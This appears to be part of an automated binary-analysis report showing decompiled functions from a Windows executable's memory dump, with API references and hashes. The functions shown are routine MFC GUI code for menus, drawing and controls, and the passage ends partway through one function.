			E00401A05(intOrPtr __ecx) {
				void* _t45;

				L004269E6();
				_push(__ecx);
				_push( *((intOrPtr*)(_t45 + 8)));
				 *((intOrPtr*)(_t45 - 0x10)) = __ecx;
				_push(0x8b);
				L00426408();
				 *(_t45 - 4) =  *(_t45 - 4) & 0x00000000;
				L004260F6();
				 *((intOrPtr*)(__ecx + 0x60)) = 0x42d834;
				 *(_t45 - 4) = 1;
				L004260F6();
				 *((intOrPtr*)(__ecx + 0xa0)) = 0x42d834;
				 *(_t45 - 4) = 2;
				L004260F6();
				 *((intOrPtr*)(__ecx + 0xe0)) = 0x42d834;
				 *(_t45 - 4) = 3;
				L004260F6();
				 *((intOrPtr*)(__ecx + 0x120)) = 0x42d834;
				 *(_t45 - 4) = 4;
				L004260F6();
				 *((intOrPtr*)(__ecx + 0x160)) = 0x42d834;
				 *(_t45 - 4) = 5;
				L004260F6();
				 *((intOrPtr*)(__ecx + 0x1a0)) = 0x42d834;
				 *(_t45 - 4) = 6;
				L004260F6();
				 *((intOrPtr*)(__ecx + 0x1e0)) = 0x42d834;
				 *((intOrPtr*)(__ecx)) = 0x42da2c;
				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
				return __ecx;
			}

0x0040e7ae
0x0040e7b3
0x0040e7b9
0x0040e7bc
0x0040e7bf
0x0040e7c4
0x0040e7c9
0x0040e7d2
0x0040e7dc
0x0040e7e4
0x0040e7ea
0x0040e7ef
0x0040e7f7
0x0040e7fd
0x0040e802
0x0040e80a
0x0040e810
0x0040e815
0x0040e81d
0x0040e823
0x0040e828
0x0040e830
0x0040e836
0x0040e83b
0x0040e843
0x0040e849
0x0040e851
0x0040e853
0x0040e85e
0x0040e866

APIs

_EH_prolog.MSVCRT ref: 0040E7AE
#324.MFC42(0000008B,?), ref: 0040E7C4
#567.MFC42(0000008B,?), ref: 0040E7D2
#567.MFC42(0000008B,?), ref: 0040E7EA
#567.MFC42(0000008B,?), ref: 0040E7FD
#567.MFC42(0000008B,?), ref: 0040E810
#567.MFC42(0000008B,?), ref: 0040E823
#567.MFC42(0000008B,?), ref: 0040E836
#567.MFC42(0000008B,?), ref: 0040E849

Strings

zdB, xrefs: 0040E7D7

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #567$#324H_prolog
String ID: zdB
API String ID: 419755302-1063565963
Opcode ID: afcd0a23946ef62a3d9d15368e41457328ad9ad959bd1d3a7b5e6fcf66fba070
Instruction ID: d82e06ae01fecca8ea9fedf2c8cda9653390896306158de01c2a6e7f3fef3dca
Opcode Fuzzy Hash: afcd0a23946ef62a3d9d15368e41457328ad9ad959bd1d3a7b5e6fcf66fba070
Instruction Fuzzy Hash: E42190B17043A4DBCB05DF65EA8179DBB64FF85344F50806EE8024B342DBB95A08DB65

Uniqueness

Uniqueness Score: -1.00%

Function 00422461, Relevance: 16.7, APIs: 11, Instructions: 165
windowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00422461(intOrPtr __ecx, void* __eflags) {
				intOrPtr _t97;
				struct HBRUSH__* _t101;
				struct tagRECT _t114;
				struct HBRUSH__* _t117;
				struct HICON__* _t122;
				signed int _t123;
				void* _t124;
				signed int _t138;
				intOrPtr _t140;
				struct tagRECT _t141;
				intOrPtr _t142;
				intOrPtr _t154;
				intOrPtr _t156;
				struct tagSIZE* _t161;
				struct tagSIZE _t163;
				void* _t164;
				intOrPtr _t171;
				intOrPtr _t172;
				void* _t175;

				L004269E6();
				_t140 =  *((intOrPtr*)(_t175 + 0x14));
				 *((intOrPtr*)(_t175 - 0x10)) = __ecx;
				_push(_t175 - 0x14);
				L004014F6(_t140);
				_t161 = _t175 - 0x24;
				 *(_t175 - 4) =  *(_t175 - 4) & 0x00000000;
				GetTextExtentPoint32A( *( *((intOrPtr*)(_t175 + 8)) + 8),  *(_t175 - 0x14),  *( *(_t175 - 0x14) - 8), _t161);
				_t163 =  *(_t175 - 0x24);
				 *(_t175 - 0x1c) = _t163;
				_t164 = _t163 + 4;
				if(_t164 > 0xc8) {
					_t164 = 0xc8;
				}
				 *(_t175 + 0x10) =  *(_t175 + 0x10) & 0x00000000;
				_t171 =  *((intOrPtr*)( *(_t175 + 0x10) + 0xc)) -  *((intOrPtr*)( *(_t175 + 0x10) + 4)) - 0x1a;
				if( *((intOrPtr*)(_t140 + 0x20)) != 0) {
					_t138 = 0x12;
					 *(_t175 + 0x10) = _t138;
					_t164 = _t164 + _t138;
				}
				_t141 =  *(_t175 + 0xc);
				_t97 = _t164 + 6;
				 *((intOrPtr*)(_t175 - 0x18)) = _t97;
				 *((intOrPtr*)(_t175 - 0x2c)) = _t97 + _t141;
				_t24 = _t171 + 0x15; // -5
				 *((intOrPtr*)(_t175 - 0x28)) = _t24;
				_t101 =  *((intOrPtr*)(_t175 - 0x10)) + 0x40;
				 *(_t175 - 0x34) = _t141;
				 *((intOrPtr*)(_t175 - 0x30)) = _t171;
				if(_t101 != 0) {
					_t101 =  *(_t101 + 4);
				}
				FrameRect( *( *((intOrPtr*)(_t175 + 8)) + 4), _t175 - 0x34, _t101);
				_push( *((intOrPtr*)(_t175 - 0x10)) + 0x70);
				L00426636();
				_t35 = _t171 + 0x13; // -7
				_push(_t141 + 1);
				_push(_t175 - 0x2c);
				L004266F0();
				_t39 = _t171 + 0x13; // -7
				_push(_t164 + _t141 + 4);
				L004266EA();
				_push(_t171);
				_push(_t164 + _t141 + 4);
				_push(_t175 - 0x2c);
				L004266F0();
				_t48 = _t171 + 0x13; // -7
				_push(_t164 + _t141 + 4);
				L004266EA();
				_t114 = _t141 + 1;
				_t52 = _t171 + 1; // -25
				_t154 = _t52;
				 *(_t175 - 0x34) = _t114;
				 *((intOrPtr*)(_t175 - 0x30)) = _t154;
				 *((intOrPtr*)(_t175 - 0x2c)) = _t164 + _t114 + 2;
				_t117 =  *((intOrPtr*)(_t175 - 0x10)) + 0x48;
				 *((intOrPtr*)(_t175 - 0x28)) = _t154 + 0x11;
				if(_t117 != 0) {
					_t117 =  *(_t117 + 4);
				}
				FillRect( *( *((intOrPtr*)(_t175 + 8)) + 4), _t175 - 0x34, _t117);
				_t122 =  *( *((intOrPtr*)(_t175 + 0x14)) + 0x20);
				if(_t122 != 0) {
					_t66 = _t171 + 2; // -24
					DrawIconEx( *( *((intOrPtr*)(_t175 + 8)) + 4), _t141 + 4, _t66, _t122, 0x10, 0x10, 0, 0, 3);
				}
				_t123 =  *(_t175 + 0x10);
				_t156 =  *((intOrPtr*)(_t175 - 0x20));
				_t73 = _t141 + 3; // 0x3
				_t142 = _t123 + _t73;
				_t124 = 0x14;
				asm("cdq");
				 *((intOrPtr*)(_t175 - 0x44)) = _t142;
				 *((intOrPtr*)(_t175 - 0x3c)) = _t164 - _t123 + _t142;
				_t77 = _t171 + 1; // 0x15
				_t172 = (_t124 - _t156 - _t161 >> 1) + _t77;
				 *((intOrPtr*)(_t175 - 0x40)) = _t172;
				 *((intOrPtr*)(_t175 - 0x38)) = _t172 + _t156;
				L00401BC7( *((intOrPtr*)(_t175 + 0x14)),  *((intOrPtr*)(_t175 - 0x10)) + 0x80);
				E004011B8( *((intOrPtr*)(_t175 + 0x14)), _t175 - 0x44);
				 *(_t175 - 4) =  *(_t175 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t175 - 0xc));
				return  *((intOrPtr*)(_t175 - 0x18));
			}

0x00422466
0x0042246f
0x00422473
0x0042247a
0x0042247d
0x00422485
0x00422488
0x00422498
0x0042249e
0x004224a6
0x004224a9
0x004224ae
0x004224b0
0x004224b0
0x004224b5
0x004224bf
0x004224c6
0x004224ca
0x004224cb
0x004224ce
0x004224ce
0x004224d0
0x004224d3
0x004224d6
0x004224db
0x004224de
0x004224e1
0x004224e7
0x004224ea
0x004224ef
0x004224f2
0x004224f4
0x004224f4
0x00422502
0x00422511
0x00422512
0x00422517
0x00422521
0x00422525
0x00422526
0x0042252b
0x00422533
0x00422537
0x00422543
0x00422544
0x00422548
0x00422549
0x00422551
0x00422559
0x0042255a
0x0042255f
0x00422562
0x00422562
0x00422565
0x00422568
0x00422572
0x00422578
0x0042257b
0x00422580
0x00422582
0x00422582
0x00422590
0x00422599
0x0042259e
0x004225ab
0x004225b9
0x004225b9
0x004225bf
0x004225c2
0x004225c9
0x004225c9
0x004225cd
0x004225d2
0x004225d5
0x004225da
0x004225dd
0x004225dd
0x004225e4
0x004225f2
0x004225f5
0x00422601
0x00422606
0x0042260d
0x0042261b
0x00422623

APIs

_EH_prolog.MSVCRT ref: 00422466
GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 00422498
FrameRect.USER32 ref: 00422502
#5787.MFC42(-00000070), ref: 00422512
#4297.MFC42(?,?,-00000007,-00000070), ref: 00422526
#4133.MFC42(00000000,-00000007,?,?,-00000007,-00000070), ref: 00422537
#4297.MFC42(?,00000000,-0000001A,00000000,-00000007,?,?,-00000007,-00000070), ref: 00422549
#4133.MFC42(00000000,-00000007,?,00000000,-0000001A,00000000,-00000007,?,?,-00000007,-00000070), ref: 0042255A
FillRect.USER32 ref: 00422590
DrawIconEx.USER32 ref: 004225B9

Part of subcall function 004011B8: #4299.MFC42(?,?,?,?,00000001), ref: 00421529

#800.MFC42(-00000080), ref: 0042260D

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #4133#4297Rect$#4299#5787#800DrawExtentFillFrameH_prologIconPoint32Text
String ID:
API String ID: 182759629-0
Opcode ID: f327a2a9aa4760b7f3610bc7f87492f059261560e1dee2382e353ef417d6957a
Instruction ID: 39acb9cdce0d1b7ed9ea6aab3785e0f38b905c55b151b1ea56fb812a60c5a23a
Opcode Fuzzy Hash: f327a2a9aa4760b7f3610bc7f87492f059261560e1dee2382e353ef417d6957a
Instruction Fuzzy Hash: 6D611C76A0021AAFCB10CF98D985EDEBBB9FF48304F05812AF905E7251D774EA04CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004149A9, Relevance: 16.7, APIs: 11, Instructions: 164
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004149A9(void* __ebx, char __ecx, void* __fp0) {
				char _t71;
				char _t75;
				int _t77;
				int _t78;
				int _t79;
				char _t84;
				void* _t90;
				char _t91;
				char _t92;
				int _t99;
				intOrPtr* _t102;
				signed int _t116;
				char _t118;
				CHAR* _t122;
				int _t123;
				void* _t125;
				void* _t132;

				_t132 = __fp0;
				_t90 = __ebx;
				_t71 = E004290BB;
				L004269E6();
				_t118 = __ecx;
				while(( *(_t125 + 0x10) & 0x00000400) == 0) {
					 *(_t125 - 0x10) =  *(_t125 - 0x10) & 0x00000000;
					_t71 = L004013CA(_t118,  *(_t125 + 8), _t125 - 0x10);
					if(_t71 == 0) {
						_t79 = 0;
						L35:
						 *[fs:0x0] =  *((intOrPtr*)(_t125 - 0xc));
						return _t79;
					} else {
						 *(_t125 + 0x10) =  *(_t125 + 0x10) | 0x00000400;
						 *(_t125 + 8) =  *(_t125 - 0x10);
						_t118 = _t71;
						continue;
					}
				}
				_push(_t90);
				_t91 = 0;
				__eflags =  *(_t125 + 0x14);
				if( *(_t125 + 0x14) != 0) {
					_t71 = 0x100;
					__eflags =  *(_t125 + 0x10) & 0x00000100;
					if(( *(_t125 + 0x10) & 0x00000100) == 0) {
						_t17 = _t125 + 0x10;
						 *_t17 =  *(_t125 + 0x10) | 0x00000100;
						__eflags =  *_t17;
					}
				} else {
					 *(_t125 + 0x10) = 0xd00;
				}
				__eflags =  *(_t125 + 0x10) & 0x00000010;
				if(( *(_t125 + 0x10) & 0x00000010) != 0) {
					__eflags =  *(_t118 + 0x50);
					if( *(_t118 + 0x50) != 0) {
						_t91 = L0040222A(_t118);
						__eflags =  *(_t125 + 8) - _t91;
						if( *(_t125 + 8) < _t91) {
							_t91 = 0;
							__eflags = 0;
						}
					}
					_push( *(_t125 + 0x14));
					_t71 =  *0x4421a0;
					_push(_t71);
					L00426582();
					_push(1);
					_push( *(_t125 + 0x14));
					_push( *(_t125 + 8));
					L0042658E();
				}
				__eflags =  *(_t125 + 8) - 0xffffffff;
				if( *(_t125 + 8) == 0xffffffff) {
					_t71 = GetMenuItemCount( *(_t118 + 4));
					 *(_t125 + 8) = _t71;
				}
				_push(0x24);
				L00425E38();
				__eflags = _t71;
				if(_t71 == 0) {
					_t122 = 0;
					__eflags = 0;
				} else {
					_t122 = L00401D7F(_t71);
				}
				_push(1);
				_push(_t122);
				_push( *(_t125 + 8) - _t91);
				L0042658E();
				L004013DE(_t122,  *(_t125 + 0xc));
				_t92 =  *(_t125 + 0x18);
				_t122[4] = _t122[4] | 0xffffffff;
				__eflags = _t92;
				_t122[0xc] = _t92;
				if(_t92 < 0) {
					_t75 =  *0x4421b8;
					 *(_t125 + 0xc) =  *(_t125 + 0xc) | 0xffffffff;
					_t116 = 0;
					__eflags = _t75;
					if(_t75 <= 0) {
						L31:
						_t122[8] =  *(_t125 + 0xc);
						goto L32;
					}
					_t102 =  *0x4421b4;
					while(1) {
						__eflags =  *_t102 -  *(_t125 + 0x14);
						if( *_t102 ==  *(_t125 + 0x14)) {
							break;
						}
						_t116 = _t116 + 1;
						_t102 = _t102 + 4;
						__eflags = _t116 - _t75;
						if(_t116 < _t75) {
							continue;
						}
						goto L31;
					}
					 *(_t125 + 0xc) = _t116;
					goto L31;
				} else {
					L00425F8E();
					 *(_t125 - 4) =  *(_t125 - 4) & 0x00000000;
					 *(_t125 + 0xc) =  *(_t125 + 0xc) & 0x00000000;
					_push(_t125 + 0xc);
					_push(_t92);
					_push( *(_t125 + 0x14));
					E00401FBE();
					__eflags = _t122[0x1c];
					if(_t122[0x1c] != 0) {
						L004266BA();
						_t46 =  &(_t122[0x1c]);
						 *_t46 = _t122[0x1c] & 0x00000000;
						__eflags =  *_t46;
					}
					_push(1);
					_push(1);
					_push(0xff);
					_push( *0x440d0c);
					_push( *0x440d08);
					L00426000();
					_t84 = E00401140(_t118, _t132, _t125 - 0x18, _t92);
					__eflags = _t84;
					if(_t84 != 0) {
						_push( *(_t125 + 0x14));
						_push( *(_t125 + 0xc));
						_push(_t125 - 0x18);
						_t122[8] = L00401294(_t118);
					}
					 *(_t125 - 4) =  *(_t125 - 4) | 0xffffffff;
					L00425FB2();
					L32:
					_t99 =  *(_t125 + 0x14);
					_t77 =  *(_t125 + 0x10);
					_t122[0x10] = _t77;
					_t122[0x14] = _t99;
					_t78 = InsertMenuA( *(_t118 + 4),  *(_t125 + 8), _t77, _t99, _t122);
					__eflags =  *(_t118 + 0x50);
					_t123 = _t78;
					if(__eflags != 0) {
						E00401456(_t118, __eflags);
					}
					_t79 = _t123;
					goto L35;
				}
			}

0x004149a9
0x004149a9
0x004149a9
0x004149ae
0x004149b8
0x004149bf
0x004149c4
0x004149d1
0x004149d8
0x004149e7
0x00414b79
0x00414b7e
0x00414b86
0x004149da
0x004149dd
0x004149e0
0x004149e3
0x00000000
0x004149e3
0x004149d8
0x004149ee
0x004149ef
0x004149f1
0x004149f4
0x004149ff
0x00414a04
0x00414a07
0x00414a09
0x00414a09
0x00414a09
0x00414a09
0x004149f6
0x004149f6
0x004149f6
0x00414a0c
0x00414a10
0x00414a12
0x00414a16
0x00414a1f
0x00414a21
0x00414a24
0x00414a26
0x00414a26
0x00414a26
0x00414a24
0x00414a28
0x00414a2b
0x00414a35
0x00414a36
0x00414a3b
0x00414a40
0x00414a43
0x00414a46
0x00414a46
0x00414a4b
0x00414a4f
0x00414a54
0x00414a5a
0x00414a5a
0x00414a5d
0x00414a5f
0x00414a64
0x00414a67
0x00414a74
0x00414a74
0x00414a69
0x00414a70
0x00414a70
0x00414a79
0x00414a7d
0x00414a7e
0x00414a82
0x00414a8c
0x00414a91
0x00414a94
0x00414a98
0x00414a9a
0x00414a9d
0x00414b1d
0x00414b22
0x00414b26
0x00414b28
0x00414b2a
0x00414b46
0x00414b49
0x00000000
0x00414b49
0x00414b2c
0x00414b32
0x00414b35
0x00414b37
0x00000000
0x00000000
0x00414b39
0x00414b3a
0x00414b3d
0x00414b3f
0x00000000
0x00000000
0x00000000
0x00414b41
0x00414b43
0x00000000
0x00414a9f
0x00414aa2
0x00414aa7
0x00414aab
0x00414ab4
0x00414ab5
0x00414ab6
0x00414ab9
0x00414ac1
0x00414ac3
0x00414ac5
0x00414aca
0x00414aca
0x00414aca
0x00414aca
0x00414ace
0x00414ad0
0x00414ad2
0x00414ada
0x00414ae0
0x00414ae6
0x00414af2
0x00414af7
0x00414af9
0x00414afb
0x00414b03
0x00414b06
0x00414b0c
0x00414b0c
0x00414b0f
0x00414b16
0x00414b4c
0x00414b4c
0x00414b4f
0x00414b55
0x00414b5b
0x00414b61
0x00414b67
0x00414b6b
0x00414b6e
0x00414b72
0x00414b72
0x00414b77
0x00000000
0x00414b77

APIs

_EH_prolog.MSVCRT ref: 004149AE
#5860.MFC42(?,?), ref: 00414A36
#3986.MFC42(?,?,00000001,?,?), ref: 00414A46
GetMenuItemCount.USER32 ref: 00414A54
#823.MFC42(00000024), ref: 00414A5F
#3986.MFC42(000000FF,00000000,00000001), ref: 00414A82
#384.MFC42(?,000000FF,00000000,00000001), ref: 00414AA2
#2408.MFC42(?,000000FF,00000000,00000001), ref: 00414AC5
#2096.MFC42(000000FF,00000001,00000001,?,000000FF,00000000,00000001), ref: 00414AE6
#686.MFC42(000000FF,00000001,00000001,?,000000FF,00000000,00000001), ref: 00414B16
InsertMenuA.USER32(000000FF,000000FF,00000010,?,00000000), ref: 00414B61

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #3986Menu$#2096#2408#384#5860#686#823CountH_prologInsertItem
String ID:
API String ID: 207479399-0
Opcode ID: f686fc7d2e50c6847ed5ef80c816d449cc0638917575d684342f069930879219
Instruction ID: 5151ce4072fd45881123b92c350267f15d601cff50aceb8666a5f162e51ddbc9
Opcode Fuzzy Hash: f686fc7d2e50c6847ed5ef80c816d449cc0638917575d684342f069930879219
Instruction Fuzzy Hash: F251E07060020AAFDB14DF61D941BEF7BA5FF84354F00812EFA16962A0D778D991CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004015CD, Relevance: 16.6, APIs: 11, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E004015CD(intOrPtr __ecx, void* __eflags) {
				intOrPtr* _t53;
				intOrPtr* _t59;
				intOrPtr* _t60;
				intOrPtr* _t61;
				intOrPtr* _t62;
				intOrPtr* _t63;
				intOrPtr* _t64;
				intOrPtr* _t65;
				intOrPtr* _t66;
				intOrPtr* _t67;
				void* _t76;

				L004269E6();
				_push(__ecx);
				_push(__ecx);
				 *((intOrPtr*)(_t76 - 0x14)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x42f394;
				 *(_t76 - 4) = 9;
				L004020EA();
				_t59 = __ecx + 0x80;
				 *((intOrPtr*)(_t76 - 0x10)) = _t59;
				 *_t59 = 0x42c514;
				 *(_t76 - 4) = 0xa;
				L00425FA6();
				_t60 = __ecx + 0x78;
				 *((intOrPtr*)( *((intOrPtr*)(_t76 - 0x10)))) = 0x42c4fc;
				 *((intOrPtr*)(_t76 - 0x10)) = _t60;
				 *_t60 = 0x42c514;
				 *(_t76 - 4) = 0xb;
				L00425FA6();
				_t61 = __ecx + 0x70;
				 *((intOrPtr*)(_t76 - 0x10)) = _t61;
				 *((intOrPtr*)( *((intOrPtr*)(_t76 - 0x10)))) = 0x42c4fc;
				 *_t61 = 0x42c514;
				 *(_t76 - 4) = 0xc;
				L00425FA6();
				_t62 = __ecx + 0x68;
				 *((intOrPtr*)(_t76 - 0x10)) = _t62;
				 *((intOrPtr*)( *((intOrPtr*)(_t76 - 0x10)))) = 0x42c4fc;
				 *_t62 = 0x42c514;
				 *(_t76 - 4) = 0xd;
				L00425FA6();
				_t63 = __ecx + 0x60;
				 *((intOrPtr*)(_t76 - 0x10)) = _t63;
				 *((intOrPtr*)( *((intOrPtr*)(_t76 - 0x10)))) = 0x42c4fc;
				 *_t63 = 0x42c514;
				 *(_t76 - 4) = 0xe;
				L00425FA6();
				_t64 = __ecx + 0x58;
				 *((intOrPtr*)(_t76 - 0x10)) = _t64;
				 *((intOrPtr*)( *((intOrPtr*)(_t76 - 0x10)))) = 0x42c4fc;
				 *_t64 = 0x42c514;
				 *(_t76 - 4) = 0xf;
				L00425FA6();
				_t65 = __ecx + 0x50;
				 *((intOrPtr*)(_t76 - 0x10)) = _t65;
				 *((intOrPtr*)( *((intOrPtr*)(_t76 - 0x10)))) = 0x42c4fc;
				 *_t65 = 0x42c514;
				 *(_t76 - 4) = 0x10;
				L00425FA6();
				_t66 = __ecx + 0x48;
				 *((intOrPtr*)(_t76 - 0x10)) = _t66;
				 *((intOrPtr*)( *((intOrPtr*)(_t76 - 0x10)))) = 0x42c4fc;
				 *_t66 = 0x42c514;
				 *(_t76 - 4) = 0x11;
				L00425FA6();
				_t67 = __ecx + 0x40;
				 *((intOrPtr*)(_t76 - 0x10)) = _t67;
				 *((intOrPtr*)( *((intOrPtr*)(_t76 - 0x10)))) = 0x42c4fc;
				 *_t67 = 0x42c514;
				 *(_t76 - 4) = 0x12;
				L00425FA6();
				_t53 =  *((intOrPtr*)(_t76 - 0x10));
				 *(_t76 - 4) =  *(_t76 - 4) | 0xffffffff;
				 *_t53 = 0x42c4fc;
				L004268D0();
				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
				return _t53;
			}

0x0042182c
0x00421831
0x00421832
0x00421838
0x0042183b
0x00421847
0x0042184e
0x00421853
0x0042185e
0x00421861
0x00421863
0x00421867
0x00421874
0x00421877
0x00421879
0x0042187c
0x0042187e
0x00421882
0x0042188a
0x0042188d
0x00421890
0x00421892
0x00421894
0x00421898
0x004218a0
0x004218a3
0x004218a6
0x004218a8
0x004218aa
0x004218ae
0x004218b6
0x004218b9
0x004218bc
0x004218be
0x004218c0
0x004218c4
0x004218cc
0x004218cf
0x004218d2
0x004218d4
0x004218d6
0x004218da
0x004218e2
0x004218e5
0x004218e8
0x004218ea
0x004218ec
0x004218f0
0x004218f8
0x004218fb
0x004218fe
0x00421900
0x00421902
0x00421906
0x0042190e
0x00421911
0x00421914
0x00421916
0x00421918
0x0042191c
0x00421921
0x00421924
0x0042192a
0x0042192c
0x00421937
0x0042193f

APIs

_EH_prolog.MSVCRT ref: 0042182C
#2414.MFC42 ref: 00421867
#2414.MFC42 ref: 00421882
#2414.MFC42 ref: 00421898
#2414.MFC42 ref: 004218AE
#2414.MFC42 ref: 004218C4
#2414.MFC42 ref: 004218DA
#2414.MFC42 ref: 004218F0
#2414.MFC42 ref: 00421906
#2414.MFC42 ref: 0042191C
#818.MFC42 ref: 0042192C

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2414$#818H_prolog
String ID:
API String ID: 4159539385-0
Opcode ID: 795860b917f2564519edf6b1ca6858e813744744ed46d6a80c63f7106b78d19b
Instruction ID: 908b4c71e5388689c6bfed8af60c81a0ab2b10f517d3962cc341cfac6398f475
Opcode Fuzzy Hash: 795860b917f2564519edf6b1ca6858e813744744ed46d6a80c63f7106b78d19b
Instruction Fuzzy Hash: D5416C70E0026ACFCB05DFA9D5806ADBBF4FF59308F50009EE414AB352D7B45A05CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00401A8C, Relevance: 16.6, APIs: 11, Instructions: 88
windowCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00401A8C(intOrPtr __ecx) {
				intOrPtr _t44;
				intOrPtr _t47;
				intOrPtr _t51;
				long _t56;
				void* _t70;
				intOrPtr _t74;
				void* _t77;

				L004269E6();
				_t74 = __ecx;
				 *((intOrPtr*)(_t77 - 0x10)) = __ecx;
				 *(_t77 - 4) = 2;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( *((intOrPtr*)(_t77 + 8)));
				_push(0);
				_t70 = 3;
				_push(_t70);
				L00426072();
				_t44 =  *((intOrPtr*)(_t77 + 0xc));
				 *(_t77 - 0x38) = _t70;
				 *((intOrPtr*)(_t77 - 0x34)) = 0;
				 *((intOrPtr*)(_t77 - 0x30)) = 1;
				_push( *((intOrPtr*)(_t44 - 8)));
				L0042601E();
				_push(0xffffffff);
				 *((intOrPtr*)(_t77 - 0x24)) = _t44;
				L00426018();
				 *((intOrPtr*)(_t77 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t77 + 0xc)) - 8));
				_t47 =  *((intOrPtr*)(_t77 + 0x10));
				if(_t47 != 0xffffffff) {
					 *(_t77 - 0x1c) = _t47 + 3;
				} else {
					 *(_t77 - 0x1c) = 2;
				}
				SendMessageA( *(_t74 + 0x20), 0x1006, 0, _t77 - 0x38);
				_t51 =  *((intOrPtr*)(_t77 + 0x14));
				 *(_t77 - 0x60) = 3;
				 *((intOrPtr*)(_t77 - 0x5c)) = 0;
				 *(_t77 - 0x58) = 2;
				_push( *((intOrPtr*)(_t51 - 8)));
				L0042601E();
				_push(0xffffffff);
				 *((intOrPtr*)(_t77 - 0x4c)) = _t51;
				L00426018();
				 *((intOrPtr*)(_t77 - 0x44)) = 1;
				 *((intOrPtr*)(_t77 - 0x48)) =  *((intOrPtr*)( *((intOrPtr*)(_t77 + 0x14)) - 8));
